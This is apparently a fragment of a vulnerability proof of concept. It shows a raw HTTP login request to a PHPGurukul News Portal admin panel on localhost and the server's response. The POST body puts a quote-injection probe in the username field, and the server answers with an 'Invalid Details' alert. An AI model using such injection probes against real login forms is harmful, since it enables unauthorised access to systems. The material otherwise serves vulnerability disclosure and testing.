text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://127.0.0.1/newsportal/admin/Accept-Encoding: gzip, deflateAccept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7Cookie: USERSUB_TYPE=0; IS_MODERATOR=0; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; user_uniq_agent=95e1b7d0ab9086d6b88e9adfaacf07d887164827a5708adf; SES_ROLE=3; USER_UNIQ=117b06da2ff9aabad1a916992e92bb26; USERTYP=3; USERTZ=33; helpdesk_uniq_agent=%7B%22temp_name%22%3A%22test%22%2C%22email%22%3A%22test%40local.host%22%7D; CPUID=8dba9a451f44121c45180df414ab6917; DEFAULT_PAGE=dashboard; CURRENT_FILTER=cases; currency=USD; phpsessid-9795-sid=s7b0dqlpebu74ls14j61e5q3be; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; WBCELastConnectJS=1688869781; PHPSESSID=2vag12caoqvv76avbeslm65je8Connection: closeusername=admin''&password=Test%40123&login=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sun, 09 Jul 2023 11:02:15 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17X-Powered-By: PHP/8.1.17Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 4733Connection: closeContent-Type: text/html; charset=UTF-8<script>alert('Invalid Details');</script><!DOCTYPE html><html lang="en">    <head>        <meta charset="utf-8">        <meta name="viewport" content="width=device-width, initial-scale=1.0">        <meta name="description" content="News Portal.">        <meta name="author" content="PHPGurukul">                <title>News Portal | Admin Panel</title>[...]

Tag

#web